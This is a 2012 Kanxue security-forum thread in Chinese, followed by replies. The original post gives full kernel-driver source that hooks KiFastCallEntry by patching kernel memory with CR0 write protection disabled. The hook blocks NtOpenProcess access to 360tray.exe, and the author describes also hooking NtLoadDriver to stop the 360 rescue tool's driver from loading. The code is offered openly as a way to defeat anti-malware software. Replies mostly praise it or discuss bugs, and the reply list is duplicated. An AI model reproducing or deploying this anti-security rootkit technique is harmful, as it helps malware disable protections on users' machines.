[原创]内核钩子源码！对抗360急救箱-付费问答-看雪-安全社区|安全招聘|kanxue.com

[旧帖] [原创]内核钩子源码！对抗360急救箱 0.00雪花

发表于: 2012-1-15 19:54 8297

[旧帖] [原创]内核钩子源码！对抗360急救箱 0.00雪花

viphack

2012-1-15 19:54

8297

#include <ntddk.h>

#define BYTE unsigned char

#define MEM 'viphac'

NTSTATUS DriverEntry(
            IN PDRIVER_OBJECT    DriverObject,
            IN PUNICODE_STRING    RegistryPath
            );

VOID Unload(
      IN PDRIVER_OBJECT    DriverObject
      );

typedef NTSTATUS (*NTOPENPROCESS)(
                        OUT PHANDLE          ProcessHandle,
                        IN ACCESS_MASK       AccessMask,
                        IN POBJECT_ATTRIBUTES ObjectAttributes,
                        IN PCLIENT_ID          ClientId
                        );

NTSTATUS PsLookupProcessByProcessId(
                        IN HANDLE    ProcessId,
                        OUT PEPROCESS *Process
                        );

PUCHAR PsGetProcessImageFileName(
                     IN PEPROCESS EProcess
                     );

#ifdef ALLOC_PRAGMA
#pragma alloc_text(INIT, DriverEntry)
#pragma alloc_text(PAGE, Unload)
#endif

NTOPENPROCESS OldNtOpenProcess;

BYTE JmpCode[5]={0xE9,0x00,0x00,0x00,0x00};
BYTE OrgCode[5]={0x8B,0x3F,0x8B,0x1C,0x87};
BYTE PushRetCode[6]={0x68,0x00,0x00,0x00,0x00,0xc3};

ULONG uKiFastCallEntryAddr=0;
ULONG HookAddr=0;
ULONG JMPRet=0;
ULONG PushRetMem=0;

//NtOpenProcess
NTSTATUS MyNtOpenProcess(
               OUT PHANDLE ProcessHandle,
               IN ACCESS_MASK AccessMase,
               IN POBJECT_ATTRIBUTES ObjectAttributes,
               IN PCLIENT_ID ClientId
               )
{
PEPROCESS lpPEPROCESS;
NTSTATUS  status;
char    *ProcessName;

//取要打开目标进程的PEPROCESS
status=PsLookupProcessByProcessId(ClientId->UniqueProcess,&lpPEPROCESS);

if (NT_SUCCESS(status))
{
   if (KeGetCurrentIrql()==PASSIVE_LEVEL)
   {
      ProcessName=_strupr(PsGetProcessImageFileName(lpPEPROCESS));
      if (strcmp(ProcessName,"360tray.EXE")==0) //判断打开的进程是否为
如果是返回0 即拒绝访问不是CALL回去
      {
         return STATUS_ACCESS_DENIED;
      }
   }

}
return OldNtOpenProcess(ProcessHandle,AccessMase,ObjectAttributes,ClientId);
}

//HOOK KiFastCallEntry
__declspec(naked)void OverFuck()
{
_asm
{
   pushfd
   pushad
   mov edi,dword ptr [edi]
   mov ebx,dword ptr [edi+eax*4]
   cmp OldNtOpenProcess,ebx; //比较是否为NtOpenProcess
   je Label1
   popad
   popfd
   mov edi,dword ptr [edi]
   mov ebx,dword ptr [edi+eax*4]
   jmp [JMPRet];
Label1:
   popad
   popfd
   mov ebx,MyNtOpenProcess
jmp [JMPRet];

}

}

NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject,IN PUNICODE_STRING RegistryPath)
{
NTSTATUS    status = STATUS_SUCCESS;
KIRQL       oldIrql;
UNICODE_STRING ustrFunctionName;

DbgPrint("[HideSSDT] DriverEntry!\n");

DriverObject->DriverUnload = Unload;


  RtlInitUnicodeString(&ustrFunctionName, L"NtOpenProcess" );
OldNtOpenProcess=(NTOPENPROCESS)MmGetSystemRoutineAddress( &ustrFunctionName);

DbgPrint("NtOpenProcess=0x%08X",OldNtOpenProcess);

__asm
{
   pushfd
   pushad
   mov ecx,0x176
   rdmsr
   mov uKiFastCallEntryAddr,eax
   xor ecx,ecx

//RDMSR                                  ; 特权命令

Label1:
   cmp ecx,0x100
   je Label3
   mov edx,DWORD ptr [eax]
   cmp edx,0x1C8B3F8B
je Label2
   inc eax
   inc ecx
   jmp Label1
Label2:
   mov HookAddr,eax
Label3:
   popad
   popfd
}

if (HookAddr==0)
{
   return status;
}
//申请分配二级跳转内存
PushRetMem=(ULONG)ExAllocatePoolWithTag(NonPagedPool,6,MEM);

if ((PVOID)PushRetMem==NULL)
{
   return status;
}

DbgPrint("PushRetMem=0x%08X",PushRetMem);

//一级跳转地址
*(ULONG*)&JmpCode[1]=(ULONG)(PushRetMem)-(HookAddr+5);
//二级跳转地址
*(ULONG*)&PushRetCode[1]=(ULONG)OverFuck;
//HOOK返回地址
JMPRet=HookAddr+5;

//提升中断请求级
oldIrql = KeRaiseIrqlToDpcLevel();

//关闭中断
_asm
{
   CLI       清中断允许位
   MOV EAX, CR 0
   AND EAX, NOT 10000H
   MOV CR0, EAX
}
//进行HOOK操作
RtlCopyMemory((PVOID)PushRetMem,PushRetCode,6);
RtlCopyMemory((PVOID)HookAddr,JmpCode,5);

//开启中断
_asm
{
   MOV EAX, CR0
   OR EAX, 10000H
   MOV CR0, EAX
   STI       置中断允许位
}
//恢复先前中断请求级
KeLowerIrql(oldIrql);
//添加代码

return status;
}

VOID Unload( IN PDRIVER_OBJECT DriverObject)
{
if (HookAddr!=0)
{
   KIRQL oldIrql;
   //提升中断请求级
   oldIrql = KeRaiseIrqlToDpcLevel();
   //关闭中断
   _asm
   {
      CLI
      MOV EAX, CR0
      AND EAX, NOT 10000H
      MOV CR0, EAX
   }
   //进行还原HOOK操作
   RtlCopyMemory((PVOID)HookAddr,OrgCode,5);
   _asm
   {
      MOV EAX, CR0
      OR EAX, 10000H
      MOV CR0, EAX
      STI
   }
   //恢复先前中断请求级
   KeLowerIrql(oldIrql);
   // 释放内存
   ExFreePool((PVOID)PushRetMem);
}
                              网上也看了很多帖子我晕啊！！
         C语言支持直接汇编而E语言却要转换成10进制  饿处理相当麻烦
   这个事我开学时候写的驱动：360玩的太绝一直更新偶的驱动麻麻呼呼还有很多没有解决    感兴趣的朋友玩玩吧！  吧里面的功能全部挖出来  [ATTACH][ATTACH][ATTACH 不过360急救箱确实有一个问题如果第一次加载失败了第二次即使被成功加载
      进程也不会得到保护
      NtLoadDriver  请在虚拟机中测试这个NtLoadDriver 我只写了HOOK  请手动恢复  自备XueTr  先让360急救箱允许在结束  恢复  NtLoadDriver 在运行看看 360失去了  进程隐藏+进程保护即使驱动被加载  [ATTACH] viphack.zip

[/ATTACH]
            邀请码邀请码    给我！！！！！  谢谢啊我要加入看雪BBS成为你们中间的一员

登录后可查看完整内容

[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)

上传的附件：

viphack.zip （9.16kb，89次下载）
QQ截图20120114162436.jpg （94.14kb，1868次下载）
QQ截图20120114162700.jpg （147.10kb，1843次下载）
QQ截图20120114162806.jpg （176.56kb，1840次下载）

收藏・20

免费・6

支持

最新回复 (35) 1 2 ▶
熊猫正正雪币： 2323 活跃值： (4113) 能力值： ( LV12，RANK：530 ) 在线值：发帖 137 回帖 898 粉丝 141 关注私信	熊猫正正 9 2 楼不错~~学习一下~~ 2012-1-15 20:42 0
yxgbo 雪币： 34 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 86 粉丝 0 关注私信	yxgbo 3 楼沙发~，广告位可以租吗？ 2012-1-15 20:43 0
robey 雪币： 149 活跃值： (171) 能力值： ( LV5，RANK：60 ) 在线值：发帖 7 回帖 162 粉丝 1 关注私信	robey 1 4 楼很不错，可以给邀请码了。 2012-1-15 22:13 0
loongzyd 雪币： 1015 活跃值： (235) 能力值： ( LV12，RANK：440 ) 在线值：发帖 191 回帖 1111 粉丝 4 关注私信	loongzyd 10 5 楼感谢楼主的分享 2012-1-15 22:34 0
yezhulove 雪币： 1787 活跃值： (340) 能力值： ( LV3，RANK：30 ) 在线值：发帖 12 回帖 303 粉丝 1 关注私信	yezhulove 6 楼没看懂啊，HOOK NtOpenProcess 和急救箱的隐藏进程，有啥关系。~ 还HOOK NtLoadDriver ？防止急救箱加驱动？我估计禁不掉~ 2012-1-15 23:54 0
huzhao 雪币： 388 活跃值： (10) 能力值： ( LV3，RANK：20 ) 在线值：发帖 9 回帖 124 粉丝 0 关注私信	huzhao 7 楼没看懂楼主发的图 2012-1-16 00:02 0
酱油路过雪币： 9 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 30 粉丝 0 关注私信	酱油路过 8 楼学习了！ 2012-1-16 00:39 0
GameSafe 雪币： 43 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 16 回帖 113 粉丝 1 关注私信	GameSafe 9 楼有创新有破解还是有未公开函数？没看出神秘的地方 2012-1-16 01:44 0
viphack 雪币： 219 活跃值： (783) 能力值： (RANK：290 ) 在线值：发帖 135 回帖 1009 粉丝 42 关注私信	viphack 4 10 楼其实很简单先对系统进程SSDT 我SSDT除了保护进程外还HOOK NtLoadDriver 这个不随便就能HOOK 测试 360急救箱在NtLoadDriver被HOOK的情况下驱动是加载失败的！恢复后即使驱动加载成功进程隐藏和进程保护都是空的！！还有驱动我是用E语言开发的 2012-1-16 08:41 0
luochangwe 雪币： 131 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 24 粉丝 0 关注私信	luochangwe 11 楼不错~~学习一下~~ 2012-1-16 10:28 0
寒冰心结雪币： 8192 活跃值： (2786) 能力值： ( LV3，RANK：20 ) 在线值：发帖 15 回帖 239 粉丝 0 关注私信	寒冰心结 12 楼 //取要打开目标进程的PEPROCESS status=PsLookupProcessByProcessId(ClientId->UniqueProcess,&lpPEPROCESS); if (NT_SUCCESS(status)) { ObDereferenceObject(lpPEPROCESS); if (KeGetCurrentIrql()==PASSIVE_LEVEL) { ProcessName=_strupr(PsGetProcessImageFileName(lpPEPROCESS)); if (strcmp(ProcessName,"360tray.EXE")==0) //判断打开的进程是否为如果是返回0 即拒绝访问不是CALL回去 { return STATUS_ACCESS_DENIED; } } } 2012-1-16 11:05 0
twtgh 雪币： 60 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 48 粉丝 0 关注私信	twtgh 13 楼不错，学习了 2012-1-16 12:51 0
cxthl 雪币： 249 活跃值： (71) 能力值： ( LV7，RANK：100 ) 在线值：发帖 14 回帖 120 粉丝 0 关注私信	cxthl 2 14 楼楼主放个bin啊 2012-1-16 13:42 0
kamenqikx 雪币： 4 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 9 粉丝 0 关注私信	kamenqikx 15 楼不错不错 2012-1-16 13:58 0
zgyknight 雪币： 2 活跃值： (199) 能力值： ( LV2，RANK：10 ) 在线值：发帖 31 回帖 194 粉丝 0 关注私信	zgyknight 16 楼 mark 字数补丁.exe.dll.sys 2012-1-16 18:20 0
hmilywen 雪币： 1485 活跃值： (884) 能力值： ( LV2，RANK：10 ) 在线值：发帖 24 回帖 530 粉丝 6 关注私信	hmilywen 17 楼大肉鸡说你驱动都起来,还对抗个啥,你能起来驱动就随便你玩... 2012-1-16 19:06 0
tornodo 雪币： 437 活跃值： (110) 能力值： ( LV5，RANK：70 ) 在线值：发帖 7 回帖 232 粉丝 0 关注私信	tornodo 1 18 楼看看再说。 2012-1-16 21:01 0
rail 雪币： 43 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 17 粉丝 0 关注私信	rail 19 楼学习一下。。 2012-1-16 21:08 0
doubleone 雪币： 32 活跃值： (18) 能力值： ( LV2，RANK：10 ) 在线值：发帖 66 回帖 178 粉丝 1 关注私信	doubleone 20 楼我在连接时出现了如下错误，能否帮我解释一下 Linking... Kernel hook.obj : error LNK2001: unresolved external symbol "unsigned char * __stdcall PsGetProcessImageFileName(struct _EPROCESS )" (?PsGetProcessImageFileName@@YGPAEPAU_EPROCESS@@@Z) Kernel hook.obj : error LNK2001: unresolved external symbol "__declspec(dllimport) unsigned char __stdcall KeGetCurrentIrql(void)" (__imp_?KeGetCurrentIrql@@YGEXZ) Kernel hook.obj : error LNK2001: unresolved external symbol "long __stdcall PsLookupProcessByProcessId(void ,struct _EPROCESS * )" (?PsLookupProcessByProcessId@@YGJPAXPAPAU_EPROCESS@@@Z) Kernel hook.obj : error LNK2001: unresolved external symbol "__declspec(dllimport) void __fastcall KfLowerIrql(unsigned char)" (__imp_?KfLowerIrql@@YIXE@Z) Kernel hook.obj : error LNK2001: unresolved external symbol "__declspec(dllimport) unsigned char __stdcall KeRaiseIrqlToDpcLevel(void)" (__imp_?KeRaiseIrqlToDpcLevel@@YGEXZ) Kernel hook.obj : error LNK2001: unresolved external symbol "__declspec(dllimport) void __stdcall ExAllocatePoolWithTag(enum _POOL_TYPE,unsigned long,unsigned long)" (__imp_?ExAllocatePoolWithTag@@YGPAXW4_POOL_TYPE@@KK@Z) Kernel hook.obj : error LNK2001: unresolved external symbol "__declspec(dllimport) void * __stdcall MmGetSystemRoutineAddress(struct _UNICODE_STRING )" (__imp_?MmGetSystemRoutineAddress@@YGPAXPAU_UNICODE_STRING@@@Z) Kernel hook.obj : error LNK2001: unresolved external symbol "__declspec(dllimport) void __stdcall RtlInitUnicodeString(struct _UNICODE_STRING ,unsigned short const )" (__imp_?RtlInitUnicodeString@@YGXPAU_UNICODE_STRING@@PBG@Z) Kernel hook.obj : error LNK2001: unresolved external symbol "unsigned long __cdecl DbgPrint(char ,...)" (?DbgPrint@@YAKPADZZ) Kernel hook.obj : error LNK2001: unresolved external symbol "__declspec(dllimport) void __stdcall ExFreePool(void *)" (__imp_?ExFreePool@@YGXPAX@Z) MyDriver_Check/HelloDDK.sys : fatal error LNK1120: 10 unresolved externals 2012-1-16 22:27 0
pencil 雪币： 1163 活跃值： (137) 能力值： ( LV12，RANK：230 ) 在线值：发帖 22 回帖 680 粉丝 1 关注私信	pencil 5 21 楼有点练成降龙十八掌后自废武功的意思~ 驱动对抗上大家更多关注的是如何加载。 2012-1-17 00:17 0
jerrynpc 雪币： 284 活跃值： (16) 能力值： ( LV2，RANK：10 ) 在线值：发帖 18 回帖 695 粉丝 0 关注私信	jerrynpc 22 楼废柴啊，这还申精呢。。啥也没学到啊，求楼主再发个高级点的 ...... ...... 2012-1-17 14:29 0
monsterok 雪币： 603 活跃值： (40) 能力值： ( LV9，RANK：140 ) 在线值：发帖 14 回帖 360 粉丝 0 关注私信	monsterok 3 23 楼科普文。。。 2012-1-17 16:02 0
曹牛牛雪币： 87 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 40 粉丝 0 关注私信	曹牛牛 24 楼额，确实不错，就是看着晕，一直晕。 2012-1-17 22:06 0
oOSinveOo 雪币： 54 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 5 粉丝 0 关注私信	oOSinveOo 25 楼楼主很强大小弟学习了谢楼主分享 2012-1-18 00:27 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

viphack

135

发帖

1009

回帖

290

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (35) 1 2 ▶
熊猫正正雪币： 2323 活跃值： (4113) 能力值： ( LV12，RANK：530 ) 在线值：发帖 137 回帖 898 粉丝 141 关注私信	熊猫正正 9 2 楼不错~~学习一下~~ 2012-1-15 20:42 0
yxgbo 雪币： 34 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 86 粉丝 0 关注私信	yxgbo 3 楼沙发~，广告位可以租吗？ 2012-1-15 20:43 0
robey 雪币： 149 活跃值： (171) 能力值： ( LV5，RANK：60 ) 在线值：发帖 7 回帖 162 粉丝 1 关注私信	robey 1 4 楼很不错，可以给邀请码了。 2012-1-15 22:13 0
loongzyd 雪币： 1015 活跃值： (235) 能力值： ( LV12，RANK：440 ) 在线值：发帖 191 回帖 1111 粉丝 4 关注私信	loongzyd 10 5 楼感谢楼主的分享 2012-1-15 22:34 0
yezhulove 雪币： 1787 活跃值： (340) 能力值： ( LV3，RANK：30 ) 在线值：发帖 12 回帖 303 粉丝 1 关注私信	yezhulove 6 楼没看懂啊，HOOK NtOpenProcess 和急救箱的隐藏进程，有啥关系。~ 还HOOK NtLoadDriver ？防止急救箱加驱动？我估计禁不掉~ 2012-1-15 23:54 0
huzhao 雪币： 388 活跃值： (10) 能力值： ( LV3，RANK：20 ) 在线值：发帖 9 回帖 124 粉丝 0 关注私信	huzhao 7 楼没看懂楼主发的图 2012-1-16 00:02 0
酱油路过雪币： 9 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 30 粉丝 0 关注私信	酱油路过 8 楼学习了！ 2012-1-16 00:39 0
GameSafe 雪币： 43 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 16 回帖 113 粉丝 1 关注私信	GameSafe 9 楼有创新有破解还是有未公开函数？没看出神秘的地方 2012-1-16 01:44 0
viphack 雪币： 219 活跃值： (783) 能力值： (RANK：290 ) 在线值：发帖 135 回帖 1009 粉丝 42 关注私信	viphack 4 10 楼其实很简单先对系统进程SSDT 我SSDT除了保护进程外还HOOK NtLoadDriver 这个不随便就能HOOK 测试 360急救箱在NtLoadDriver被HOOK的情况下驱动是加载失败的！恢复后即使驱动加载成功进程隐藏和进程保护都是空的！！还有驱动我是用E语言开发的 2012-1-16 08:41 0
luochangwe 雪币： 131 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 24 粉丝 0 关注私信	luochangwe 11 楼不错~~学习一下~~ 2012-1-16 10:28 0
寒冰心结雪币： 8192 活跃值： (2786) 能力值： ( LV3，RANK：20 ) 在线值：发帖 15 回帖 239 粉丝 0 关注私信	寒冰心结 12 楼 //取要打开目标进程的PEPROCESS status=PsLookupProcessByProcessId(ClientId->UniqueProcess,&lpPEPROCESS); if (NT_SUCCESS(status)) { ObDereferenceObject(lpPEPROCESS); if (KeGetCurrentIrql()==PASSIVE_LEVEL) { ProcessName=_strupr(PsGetProcessImageFileName(lpPEPROCESS)); if (strcmp(ProcessName,"360tray.EXE")==0) //判断打开的进程是否为如果是返回0 即拒绝访问不是CALL回去 { return STATUS_ACCESS_DENIED; } } } 2012-1-16 11:05 0
twtgh 雪币： 60 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 48 粉丝 0 关注私信	twtgh 13 楼不错，学习了 2012-1-16 12:51 0
cxthl 雪币： 249 活跃值： (71) 能力值： ( LV7，RANK：100 ) 在线值：发帖 14 回帖 120 粉丝 0 关注私信	cxthl 2 14 楼楼主放个bin啊 2012-1-16 13:42 0
kamenqikx 雪币： 4 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 9 粉丝 0 关注私信	kamenqikx 15 楼不错不错 2012-1-16 13:58 0
zgyknight 雪币： 2 活跃值： (199) 能力值： ( LV2，RANK：10 ) 在线值：发帖 31 回帖 194 粉丝 0 关注私信	zgyknight 16 楼 mark 字数补丁.exe.dll.sys 2012-1-16 18:20 0
hmilywen 雪币： 1485 活跃值： (884) 能力值： ( LV2，RANK：10 ) 在线值：发帖 24 回帖 530 粉丝 6 关注私信	hmilywen 17 楼大肉鸡说你驱动都起来,还对抗个啥,你能起来驱动就随便你玩... 2012-1-16 19:06 0
tornodo 雪币： 437 活跃值： (110) 能力值： ( LV5，RANK：70 ) 在线值：发帖 7 回帖 232 粉丝 0 关注私信	tornodo 1 18 楼看看再说。 2012-1-16 21:01 0
rail 雪币： 43 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 17 粉丝 0 关注私信	rail 19 楼学习一下。。 2012-1-16 21:08 0
doubleone 雪币： 32 活跃值： (18) 能力值： ( LV2，RANK：10 ) 在线值：发帖 66 回帖 178 粉丝 1 关注私信	doubleone 20 楼我在连接时出现了如下错误，能否帮我解释一下 Linking... Kernel hook.obj : error LNK2001: unresolved external symbol "unsigned char * __stdcall PsGetProcessImageFileName(struct _EPROCESS )" (?PsGetProcessImageFileName@@YGPAEPAU_EPROCESS@@@Z) Kernel hook.obj : error LNK2001: unresolved external symbol "__declspec(dllimport) unsigned char __stdcall KeGetCurrentIrql(void)" (__imp_?KeGetCurrentIrql@@YGEXZ) Kernel hook.obj : error LNK2001: unresolved external symbol "long __stdcall PsLookupProcessByProcessId(void ,struct _EPROCESS * )" (?PsLookupProcessByProcessId@@YGJPAXPAPAU_EPROCESS@@@Z) Kernel hook.obj : error LNK2001: unresolved external symbol "__declspec(dllimport) void __fastcall KfLowerIrql(unsigned char)" (__imp_?KfLowerIrql@@YIXE@Z) Kernel hook.obj : error LNK2001: unresolved external symbol "__declspec(dllimport) unsigned char __stdcall KeRaiseIrqlToDpcLevel(void)" (__imp_?KeRaiseIrqlToDpcLevel@@YGEXZ) Kernel hook.obj : error LNK2001: unresolved external symbol "__declspec(dllimport) void __stdcall ExAllocatePoolWithTag(enum _POOL_TYPE,unsigned long,unsigned long)" (__imp_?ExAllocatePoolWithTag@@YGPAXW4_POOL_TYPE@@KK@Z) Kernel hook.obj : error LNK2001: unresolved external symbol "__declspec(dllimport) void * __stdcall MmGetSystemRoutineAddress(struct _UNICODE_STRING )" (__imp_?MmGetSystemRoutineAddress@@YGPAXPAU_UNICODE_STRING@@@Z) Kernel hook.obj : error LNK2001: unresolved external symbol "__declspec(dllimport) void __stdcall RtlInitUnicodeString(struct _UNICODE_STRING ,unsigned short const )" (__imp_?RtlInitUnicodeString@@YGXPAU_UNICODE_STRING@@PBG@Z) Kernel hook.obj : error LNK2001: unresolved external symbol "unsigned long __cdecl DbgPrint(char ,...)" (?DbgPrint@@YAKPADZZ) Kernel hook.obj : error LNK2001: unresolved external symbol "__declspec(dllimport) void __stdcall ExFreePool(void *)" (__imp_?ExFreePool@@YGXPAX@Z) MyDriver_Check/HelloDDK.sys : fatal error LNK1120: 10 unresolved externals 2012-1-16 22:27 0
pencil 雪币： 1163 活跃值： (137) 能力值： ( LV12，RANK：230 ) 在线值：发帖 22 回帖 680 粉丝 1 关注私信	pencil 5 21 楼有点练成降龙十八掌后自废武功的意思~ 驱动对抗上大家更多关注的是如何加载。 2012-1-17 00:17 0
jerrynpc 雪币： 284 活跃值： (16) 能力值： ( LV2，RANK：10 ) 在线值：发帖 18 回帖 695 粉丝 0 关注私信	jerrynpc 22 楼废柴啊，这还申精呢。。啥也没学到啊，求楼主再发个高级点的 ...... ...... 2012-1-17 14:29 0
monsterok 雪币： 603 活跃值： (40) 能力值： ( LV9，RANK：140 ) 在线值：发帖 14 回帖 360 粉丝 0 关注私信	monsterok 3 23 楼科普文。。。 2012-1-17 16:02 0
曹牛牛雪币： 87 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 40 粉丝 0 关注私信	曹牛牛 24 楼额，确实不错，就是看着晕，一直晕。 2012-1-17 22:06 0
oOSinveOo 雪币： 54 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 5 粉丝 0 关注私信	oOSinveOo 25 楼楼主很强大小弟学习了谢楼主分享 2012-1-18 00:27 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复